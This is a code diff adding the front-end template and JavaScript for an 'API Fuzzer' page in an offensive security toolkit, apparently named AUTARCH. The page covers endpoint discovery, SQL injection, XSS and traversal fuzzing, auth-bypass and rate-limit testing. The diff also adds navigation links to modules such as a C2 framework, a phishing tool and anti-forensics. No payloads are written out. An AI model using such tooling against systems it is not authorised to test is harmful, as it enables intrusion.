Normal file
@ -0,0 +1,595 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — API Fuzzer{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>API Fuzzer</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Discover endpoints, fuzz parameters, and detect API vulnerabilities.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="apifuzz" data-tab="endpoints" onclick="showTab('apifuzz','endpoints')">Endpoints</button>
|
||||
<button class="tab" data-tab-group="apifuzz" data-tab="fuzzer" onclick="showTab('apifuzz','fuzzer')">Fuzzer</button>
|
||||
<button class="tab" data-tab-group="apifuzz" data-tab="results" onclick="showTab('apifuzz','results')">Results</button>
|
||||
</div>
|
||||
|
||||
<!-- ══ Endpoints Tab ══ -->
|
||||
<div class="tab-content active" data-tab-group="apifuzz" data-tab="endpoints">
|
||||
|
||||
<!-- Discover Endpoints -->
|
||||
<div class="section">
|
||||
<h2>Discover Endpoints</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Base URL</label>
|
||||
<input type="text" id="af-discover-url" placeholder="https://api.example.com">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-discover" class="btn btn-primary" onclick="afDiscover()">Discover</button>
|
||||
</div>
|
||||
<div id="af-discover-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- OpenAPI Spec Parser -->
|
||||
<div class="section">
|
||||
<h2>OpenAPI / Swagger Parser</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>OpenAPI Spec URL</label>
|
||||
<input type="text" id="af-openapi-url" placeholder="https://api.example.com/openapi.json">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-openapi" class="btn btn-primary" onclick="afParseOpenAPI()">Parse Spec</button>
|
||||
</div>
|
||||
<div id="af-openapi-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Discovered Endpoints Table -->
|
||||
<div class="section">
|
||||
<h2>Discovered Endpoints</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="afClearEndpoints()">Clear</button>
|
||||
<button class="btn btn-small" onclick="afExportEndpoints()">Export JSON</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Path</th>
|
||||
<th>Status</th>
|
||||
<th>Methods</th>
|
||||
<th>Content Type</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="af-endpoints-body">
|
||||
<tr><td colspan="4" class="empty-state">No endpoints discovered yet. Run discovery or parse an OpenAPI spec.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Fuzzer Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="apifuzz" data-tab="fuzzer">
|
||||
|
||||
<!-- Target Config -->
|
||||
<div class="section">
|
||||
<h2>Fuzz Target</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Target URL</label>
|
||||
<input type="text" id="af-fuzz-url" placeholder="https://api.example.com/users">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Method</label>
|
||||
<select id="af-fuzz-method">
|
||||
<option value="GET">GET</option>
|
||||
<option value="POST" selected>POST</option>
|
||||
<option value="PUT">PUT</option>
|
||||
<option value="PATCH">PATCH</option>
|
||||
<option value="DELETE">DELETE</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Parameters (key=value, one per line)</label>
|
||||
<textarea id="af-fuzz-params" rows="4" style="font-family:monospace;width:100%;padding:10px 12px;background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);color:var(--text-primary);font-size:0.9rem;resize:vertical" placeholder="username=admin password=test id=1"></textarea>
|
||||
</div>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Payload Type</label>
|
||||
<select id="af-fuzz-payload">
|
||||
<option value="sqli">SQL Injection</option>
|
||||
<option value="xss">Cross-Site Scripting (XSS)</option>
|
||||
<option value="traversal">Path Traversal</option>
|
||||
<option value="type_confusion">Type Confusion</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-fuzz" class="btn btn-primary" onclick="afStartFuzz()">Fuzz</button>
|
||||
<button id="btn-af-fuzz-stop" class="btn btn-stop btn-small" onclick="afStopFuzz()" style="display:none">Stop</button>
|
||||
</div>
|
||||
<div id="af-fuzz-status" class="progress-text"></div>
|
||||
<pre class="output-panel scrollable" id="af-fuzz-output" style="max-height:300px;display:none"></pre>
|
||||
</div>
|
||||
|
||||
<!-- Auth Config -->
|
||||
<div class="section">
|
||||
<h2>Authentication</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group">
|
||||
<label>Auth Type</label>
|
||||
<select id="af-auth-type" onchange="afAuthTypeChanged()">
|
||||
<option value="none">None</option>
|
||||
<option value="bearer">Bearer Token</option>
|
||||
<option value="api_key">API Key</option>
|
||||
<option value="basic">Basic Auth</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" id="af-auth-value-group" style="display:none">
|
||||
<label id="af-auth-value-label">Token</label>
|
||||
<input type="text" id="af-auth-value" placeholder="Enter token or credentials">
|
||||
</div>
|
||||
<div class="form-group" id="af-auth-header-group" style="display:none">
|
||||
<label>Header Name (API Key)</label>
|
||||
<input type="text" id="af-auth-header" placeholder="X-API-Key" value="X-API-Key">
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- GraphQL Section -->
|
||||
<div class="section">
|
||||
<h2>GraphQL Testing</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>GraphQL Introspection URL</label>
|
||||
<input type="text" id="af-gql-url" placeholder="https://api.example.com/graphql">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-gql-intro" class="btn btn-primary" onclick="afGqlIntrospect()">Introspect</button>
|
||||
<button id="btn-af-gql-depth" class="btn btn-small" onclick="afGqlDepthTest()">Depth Test</button>
|
||||
</div>
|
||||
<div id="af-gql-status" class="progress-text"></div>
|
||||
<pre class="output-panel scrollable" id="af-gql-output" style="max-height:300px;display:none"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Results Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="apifuzz" data-tab="results">
|
||||
|
||||
<!-- Findings Table -->
|
||||
<div class="section">
|
||||
<h2>Findings</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="afClearFindings()">Clear</button>
|
||||
<button class="btn btn-small" onclick="afExportFindings()">Export JSON</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Parameter</th>
|
||||
<th>Payload</th>
|
||||
<th>Type</th>
|
||||
<th>Severity</th>
|
||||
<th>Status</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="af-findings-body">
|
||||
<tr><td colspan="5" class="empty-state">No findings yet. Run the fuzzer first.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<!-- Auth Bypass Results -->
|
||||
<div class="section">
|
||||
<h2>Auth Bypass Results</h2>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-authbypass" class="btn btn-primary" onclick="afAuthBypassTest()">Test Auth Bypass</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="af-authbypass-output" style="max-height:250px"></pre>
|
||||
</div>
|
||||
|
||||
<!-- Rate Limit Test -->
|
||||
<div class="section">
|
||||
<h2>Rate Limit Test</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Target URL</label>
|
||||
<input type="text" id="af-ratelimit-url" placeholder="https://api.example.com/login">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Request Count</label>
|
||||
<input type="number" id="af-ratelimit-count" value="50" min="10" max="500">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-ratelimit" class="btn btn-primary" onclick="afRateLimitTest()">Test Rate Limit</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="af-ratelimit-output" style="max-height:250px"></pre>
|
||||
</div>
|
||||
|
||||
<!-- Response Analysis -->
|
||||
<div class="section">
|
||||
<h2>Response Analysis</h2>
|
||||
<div class="form-row">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>URL to Analyze</label>
|
||||
<input type="text" id="af-analyze-url" placeholder="https://api.example.com/endpoint">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button id="btn-af-analyze" class="btn btn-primary" onclick="afAnalyzeResponse()">Analyze</button>
|
||||
</div>
|
||||
<pre class="output-panel scrollable" id="af-analyze-output" style="max-height:300px"></pre>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── API Fuzzer ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var afEndpoints = [];
|
||||
var afFindings = [];
|
||||
var afFuzzAbort = null;
|
||||
|
||||
/* ── Endpoints Tab ── */
|
||||
function afDiscover() {
|
||||
var url = document.getElementById('af-discover-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-discover');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('af-discover-status').textContent = 'Discovering endpoints...';
|
||||
postJSON('/api-fuzzer/discover', {url: url}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('af-discover-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('af-discover-status').textContent = 'Found ' + (data.endpoints || []).length + ' endpoints';
|
||||
(data.endpoints || []).forEach(function(ep) {
|
||||
afEndpoints.push(ep);
|
||||
});
|
||||
afRenderEndpoints();
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afParseOpenAPI() {
|
||||
var url = document.getElementById('af-openapi-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-openapi');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('af-openapi-status').textContent = 'Parsing OpenAPI spec...';
|
||||
postJSON('/api-fuzzer/parse-openapi', {url: url}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('af-openapi-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('af-openapi-status').textContent = 'Parsed ' + (data.endpoints || []).length + ' endpoints from spec';
|
||||
(data.endpoints || []).forEach(function(ep) {
|
||||
afEndpoints.push(ep);
|
||||
});
|
||||
afRenderEndpoints();
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afRenderEndpoints() {
|
||||
var tbody = document.getElementById('af-endpoints-body');
|
||||
if (!afEndpoints.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="4" class="empty-state">No endpoints discovered yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
afEndpoints.forEach(function(ep, i) {
|
||||
var methods = (ep.methods || []).join(', ');
|
||||
var statusCls = '';
|
||||
var st = ep.status || 0;
|
||||
if (st >= 200 && st < 300) statusCls = 'badge-pass';
|
||||
else if (st >= 400) statusCls = 'badge-fail';
|
||||
html += '<tr>'
|
||||
+ '<td><a href="#" onclick="afSelectEndpoint(' + i + ');return false">' + esc(ep.path || '') + '</a></td>'
|
||||
+ '<td><span class="badge ' + statusCls + '">' + esc(String(st || '—')) + '</span></td>'
|
||||
+ '<td>' + esc(methods || '—') + '</td>'
|
||||
+ '<td>' + esc(ep.content_type || '—') + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function afSelectEndpoint(idx) {
|
||||
var ep = afEndpoints[idx];
|
||||
if (!ep) return;
|
||||
var base = document.getElementById('af-discover-url').value.trim() || '';
|
||||
document.getElementById('af-fuzz-url').value = base.replace(/\/+$/, '') + ep.path;
|
||||
if (ep.methods && ep.methods.length) {
|
||||
document.getElementById('af-fuzz-method').value = ep.methods[0];
|
||||
}
|
||||
showTab('apifuzz', 'fuzzer');
|
||||
}
|
||||
|
||||
function afClearEndpoints() {
|
||||
afEndpoints = [];
|
||||
afRenderEndpoints();
|
||||
}
|
||||
|
||||
function afExportEndpoints() {
|
||||
var blob = new Blob([JSON.stringify(afEndpoints, null, 2)], {type: 'application/json'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'api_endpoints.json';
|
||||
a.click();
|
||||
}
|
||||
|
||||
/* ── Fuzzer Tab ── */
|
||||
function afGetAuth() {
|
||||
var type = document.getElementById('af-auth-type').value;
|
||||
if (type === 'none') return {};
|
||||
return {
|
||||
type: type,
|
||||
value: document.getElementById('af-auth-value').value.trim(),
|
||||
header: document.getElementById('af-auth-header').value.trim()
|
||||
};
|
||||
}
|
||||
|
||||
function afParseParams() {
|
||||
var text = document.getElementById('af-fuzz-params').value.trim();
|
||||
if (!text) return {};
|
||||
var params = {};
|
||||
text.split('\n').forEach(function(line) {
|
||||
line = line.trim();
|
||||
if (!line) return;
|
||||
var idx = line.indexOf('=');
|
||||
if (idx > 0) {
|
||||
params[line.substring(0, idx).trim()] = line.substring(idx + 1).trim();
|
||||
}
|
||||
});
|
||||
return params;
|
||||
}
|
||||
|
||||
function afStartFuzz() {
|
||||
var url = document.getElementById('af-fuzz-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-fuzz');
|
||||
var stopBtn = document.getElementById('btn-af-fuzz-stop');
|
||||
var output = document.getElementById('af-fuzz-output');
|
||||
setLoading(btn, true);
|
||||
stopBtn.style.display = '';
|
||||
output.style.display = 'block';
|
||||
output.textContent = '';
|
||||
document.getElementById('af-fuzz-status').textContent = 'Fuzzing in progress...';
|
||||
|
||||
var payload = {
|
||||
url: url,
|
||||
method: document.getElementById('af-fuzz-method').value,
|
||||
params: afParseParams(),
|
||||
payload_type: document.getElementById('af-fuzz-payload').value,
|
||||
auth: afGetAuth()
|
||||
};
|
||||
|
||||
afFuzzAbort = new AbortController();
|
||||
fetchJSON('/api-fuzzer/fuzz', {
|
||||
method: 'POST',
|
||||
headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify(payload),
|
||||
signal: afFuzzAbort.signal
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
stopBtn.style.display = 'none';
|
||||
if (data.error) {
|
||||
document.getElementById('af-fuzz-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
var count = (data.findings || []).length;
|
||||
document.getElementById('af-fuzz-status').textContent = 'Complete — ' + count + ' finding(s)';
|
||||
(data.findings || []).forEach(function(f) {
|
||||
afFindings.push(f);
|
||||
output.textContent += '[' + (f.severity || 'info').toUpperCase() + '] '
|
||||
+ (f.param || '?') + ' = ' + (f.payload || '') + ' (' + (f.type || '') + ') -> ' + (f.status || '') + '\n';
|
||||
});
|
||||
afRenderFindings();
|
||||
}).catch(function(e) {
|
||||
setLoading(btn, false);
|
||||
stopBtn.style.display = 'none';
|
||||
if (e.name !== 'AbortError') {
|
||||
document.getElementById('af-fuzz-status').textContent = 'Request failed';
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function afStopFuzz() {
|
||||
if (afFuzzAbort) { afFuzzAbort.abort(); afFuzzAbort = null; }
|
||||
document.getElementById('af-fuzz-status').textContent = 'Stopped by user';
|
||||
document.getElementById('btn-af-fuzz-stop').style.display = 'none';
|
||||
var btn = document.getElementById('btn-af-fuzz');
|
||||
setLoading(btn, false);
|
||||
}
|
||||
|
||||
function afAuthTypeChanged() {
|
||||
var type = document.getElementById('af-auth-type').value;
|
||||
var valGroup = document.getElementById('af-auth-value-group');
|
||||
var hdrGroup = document.getElementById('af-auth-header-group');
|
||||
var label = document.getElementById('af-auth-value-label');
|
||||
if (type === 'none') {
|
||||
valGroup.style.display = 'none';
|
||||
hdrGroup.style.display = 'none';
|
||||
} else if (type === 'bearer') {
|
||||
valGroup.style.display = '';
|
||||
hdrGroup.style.display = 'none';
|
||||
label.textContent = 'Bearer Token';
|
||||
document.getElementById('af-auth-value').placeholder = 'eyJhbGciOi...';
|
||||
} else if (type === 'api_key') {
|
||||
valGroup.style.display = '';
|
||||
hdrGroup.style.display = '';
|
||||
label.textContent = 'API Key Value';
|
||||
document.getElementById('af-auth-value').placeholder = 'your-api-key';
|
||||
} else if (type === 'basic') {
|
||||
valGroup.style.display = '';
|
||||
hdrGroup.style.display = 'none';
|
||||
label.textContent = 'Credentials (user:pass)';
|
||||
document.getElementById('af-auth-value').placeholder = 'admin:password';
|
||||
}
|
||||
}
|
||||
|
||||
/* ── GraphQL ── */
|
||||
function afGqlIntrospect() {
|
||||
var url = document.getElementById('af-gql-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-gql-intro');
|
||||
var output = document.getElementById('af-gql-output');
|
||||
setLoading(btn, true);
|
||||
output.style.display = 'block';
|
||||
document.getElementById('af-gql-status').textContent = 'Running introspection query...';
|
||||
postJSON('/api-fuzzer/graphql/introspect', {url: url, auth: afGetAuth()}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('af-gql-status').textContent = 'Error: ' + data.error;
|
||||
output.textContent = data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('af-gql-status').textContent = 'Introspection complete — ' + (data.types || []).length + ' types found';
|
||||
output.textContent = JSON.stringify(data.schema || data, null, 2);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afGqlDepthTest() {
|
||||
var url = document.getElementById('af-gql-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-gql-depth');
|
||||
var output = document.getElementById('af-gql-output');
|
||||
setLoading(btn, true);
|
||||
output.style.display = 'block';
|
||||
document.getElementById('af-gql-status').textContent = 'Testing query depth limits...';
|
||||
postJSON('/api-fuzzer/graphql/depth-test', {url: url, auth: afGetAuth()}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('af-gql-status').textContent = 'Error: ' + data.error;
|
||||
output.textContent = data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('af-gql-status').textContent = 'Depth test complete — max depth: ' + (data.max_depth || '?');
|
||||
var lines = [];
|
||||
(data.results || []).forEach(function(r) {
|
||||
lines.push('Depth ' + r.depth + ': ' + (r.accepted ? 'ACCEPTED' : 'REJECTED') + ' (' + r.status + ')');
|
||||
});
|
||||
output.textContent = lines.join('\n') || JSON.stringify(data, null, 2);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Results Tab ── */
|
||||
function afRenderFindings() {
|
||||
var tbody = document.getElementById('af-findings-body');
|
||||
if (!afFindings.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="5" class="empty-state">No findings yet.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
afFindings.forEach(function(f) {
|
||||
var sevCls = 'badge-low';
|
||||
var sev = (f.severity || 'info').toLowerCase();
|
||||
if (sev === 'critical' || sev === 'high') sevCls = 'badge-high';
|
||||
else if (sev === 'medium') sevCls = 'badge-medium';
|
||||
else if (sev === 'low') sevCls = 'badge-low';
|
||||
html += '<tr>'
|
||||
+ '<td>' + esc(f.param || '—') + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem;max-width:250px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(f.payload || '—') + '</td>'
|
||||
+ '<td>' + esc(f.type || '—') + '</td>'
|
||||
+ '<td><span class="badge ' + sevCls + '">' + esc(sev.toUpperCase()) + '</span></td>'
|
||||
+ '<td>' + esc(String(f.status || '—')) + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function afClearFindings() {
|
||||
afFindings = [];
|
||||
afRenderFindings();
|
||||
}
|
||||
|
||||
function afExportFindings() {
|
||||
var blob = new Blob([JSON.stringify(afFindings, null, 2)], {type: 'application/json'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'api_fuzzer_findings.json';
|
||||
a.click();
|
||||
}
|
||||
|
||||
function afAuthBypassTest() {
|
||||
var url = document.getElementById('af-fuzz-url').value.trim();
|
||||
if (!url) {
|
||||
renderOutput('af-authbypass-output', 'Set a target URL in the Fuzzer tab first.');
|
||||
return;
|
||||
}
|
||||
var btn = document.getElementById('btn-af-authbypass');
|
||||
setLoading(btn, true);
|
||||
postJSON('/api-fuzzer/auth-bypass', {url: url, auth: afGetAuth()}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('af-authbypass-output', 'Error: ' + data.error); return; }
|
||||
var lines = [];
|
||||
(data.results || []).forEach(function(r) {
|
||||
lines.push('[' + (r.bypassed ? 'BYPASS' : 'BLOCKED') + '] ' + r.technique + ' -> HTTP ' + r.status);
|
||||
});
|
||||
renderOutput('af-authbypass-output', lines.join('\n') || 'No results.');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afRateLimitTest() {
|
||||
var url = document.getElementById('af-ratelimit-url').value.trim();
|
||||
var count = parseInt(document.getElementById('af-ratelimit-count').value) || 50;
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-ratelimit');
|
||||
setLoading(btn, true);
|
||||
renderOutput('af-ratelimit-output', 'Sending ' + count + ' requests...');
|
||||
postJSON('/api-fuzzer/rate-limit', {url: url, count: count, auth: afGetAuth()}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('af-ratelimit-output', 'Error: ' + data.error); return; }
|
||||
var lines = [
|
||||
'Requests sent: ' + (data.total || count),
|
||||
'Successful (2xx): ' + (data.success || 0),
|
||||
'Rate limited (429): ' + (data.rate_limited || 0),
|
||||
'Other errors: ' + (data.errors || 0),
|
||||
'Rate limit detected: ' + (data.has_rate_limit ? 'YES' : 'NO'),
|
||||
];
|
||||
if (data.limit_header) lines.push('Limit header: ' + data.limit_header);
|
||||
if (data.avg_response_ms) lines.push('Avg response time: ' + data.avg_response_ms + ' ms');
|
||||
renderOutput('af-ratelimit-output', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afAnalyzeResponse() {
|
||||
var url = document.getElementById('af-analyze-url').value.trim();
|
||||
if (!url) return;
|
||||
var btn = document.getElementById('btn-af-analyze');
|
||||
setLoading(btn, true);
|
||||
postJSON('/api-fuzzer/analyze', {url: url, auth: afGetAuth()}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) { renderOutput('af-analyze-output', 'Error: ' + data.error); return; }
|
||||
var lines = [];
|
||||
lines.push('=== Response Headers ===');
|
||||
if (data.headers) {
|
||||
Object.keys(data.headers).forEach(function(k) {
|
||||
lines.push(k + ': ' + data.headers[k]);
|
||||
});
|
||||
}
|
||||
lines.push('\n=== Security Headers ===');
|
||||
(data.security_headers || []).forEach(function(h) {
|
||||
lines.push((h.present ? '[OK] ' : '[MISSING] ') + h.name + (h.value ? ' = ' + h.value : ''));
|
||||
});
|
||||
if (data.cors) {
|
||||
lines.push('\n=== CORS ===');
|
||||
lines.push('Allow-Origin: ' + (data.cors.origin || 'not set'));
|
||||
lines.push('Allow-Methods: ' + (data.cors.methods || 'not set'));
|
||||
lines.push('Allow-Credentials: ' + (data.cors.credentials || 'not set'));
|
||||
}
|
||||
if (data.info_leak && data.info_leak.length) {
|
||||
lines.push('\n=== Information Leakage ===');
|
||||
data.info_leak.forEach(function(l) { lines.push('[!] ' + l); });
|
||||
}
|
||||
renderOutput('af-analyze-output', lines.join('\n'));
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
@ -40,12 +40,32 @@
|
||||
<li><a href="{{ url_for('defense.linux_index') }}" class="{% if request.endpoint == 'defense.linux_index' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Linux</a></li>
|
||||
<li><a href="{{ url_for('defense.windows_index') }}" class="{% if request.endpoint == 'defense.windows_index' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Windows</a></li>
|
||||
<li><a href="{{ url_for('defense.monitor_index') }}" class="{% if request.endpoint == 'defense.monitor_index' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Threat Monitor</a></li>
|
||||
<li><a href="{{ url_for('threat_intel.index') }}" class="{% if request.blueprint == 'threat_intel' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Threat Intel</a></li>
|
||||
<li><a href="{{ url_for('log_correlator.index') }}" class="{% if request.blueprint == 'log_correlator' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Log Correlator</a></li>
|
||||
<li><a href="{{ url_for('offense.index') }}" class="{% if request.blueprint == 'offense' %}active{% endif %}">Offense</a></li>
|
||||
<li><a href="{{ url_for('loadtest.index') }}" class="{% if request.blueprint == 'loadtest' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Load Test</a></li>
|
||||
<li><a href="{{ url_for('phishmail.index') }}" class="{% if request.blueprint == 'phishmail' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Gone Fishing</a></li>
|
||||
<li><a href="{{ url_for('hack_hijack.index') }}" class="{% if request.blueprint == 'hack_hijack' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Hack Hijack</a></li>
|
||||
<li><a href="{{ url_for('webapp_scanner.index') }}" class="{% if request.blueprint == 'webapp_scanner' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Web Scanner</a></li>
|
||||
<li><a href="{{ url_for('c2_framework.index') }}" class="{% if request.blueprint == 'c2_framework' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ C2 Framework</a></li>
|
||||
<li><a href="{{ url_for('wifi_audit.index') }}" class="{% if request.blueprint == 'wifi_audit' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ WiFi Audit</a></li>
|
||||
<li><a href="{{ url_for('api_fuzzer.index') }}" class="{% if request.blueprint == 'api_fuzzer' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ API Fuzzer</a></li>
|
||||
<li><a href="{{ url_for('cloud_scan.index') }}" class="{% if request.blueprint == 'cloud_scan' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Cloud Scan</a></li>
|
||||
<li><a href="{{ url_for('counter.index') }}" class="{% if request.blueprint == 'counter' %}active{% endif %}">Counter</a></li>
|
||||
<li><a href="{{ url_for('steganography.index') }}" class="{% if request.blueprint == 'steganography' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Steganography</a></li>
|
||||
<li><a href="{{ url_for('anti_forensics.index') }}" class="{% if request.blueprint == 'anti_forensics' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Anti-Forensics</a></li>
|
||||
<li><a href="{{ url_for('analyze.index') }}" class="{% if request.blueprint == 'analyze' and request.endpoint != 'analyze.hash_detection' %}active{% endif %}">Analyze</a></li>
|
||||
<li><a href="{{ url_for('analyze.hash_detection') }}" class="{% if request.endpoint == 'analyze.hash_detection' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Hash Toolkit</a></li>
|
||||
<li><a href="{{ url_for('llm_trainer.index') }}" class="{% if request.blueprint == 'llm_trainer' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ LLM Trainer</a></li>
|
||||
<li><a href="{{ url_for('password_toolkit.index') }}" class="{% if request.blueprint == 'password_toolkit' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Password Toolkit</a></li>
|
||||
<li><a href="{{ url_for('net_mapper.index') }}" class="{% if request.blueprint == 'net_mapper' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Net Mapper</a></li>
|
||||
<li><a href="{{ url_for('report_engine.index') }}" class="{% if request.blueprint == 'report_engine' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Reports</a></li>
|
||||
<li><a href="{{ url_for('ble_scanner.index') }}" class="{% if request.blueprint == 'ble_scanner' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ BLE Scanner</a></li>
|
||||
<li><a href="{{ url_for('forensics.index') }}" class="{% if request.blueprint == 'forensics' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Forensics</a></li>
|
||||
<li><a href="{{ url_for('rfid_tools.index') }}" class="{% if request.blueprint == 'rfid_tools' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ RFID/NFC</a></li>
|
||||
<li><a href="{{ url_for('malware_sandbox.index') }}" class="{% if request.blueprint == 'malware_sandbox' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Malware Sandbox</a></li>
|
||||
<li><a href="{{ url_for('osint.index') }}" class="{% if request.blueprint == 'osint' %}active{% endif %}">OSINT</a></li>
|
||||
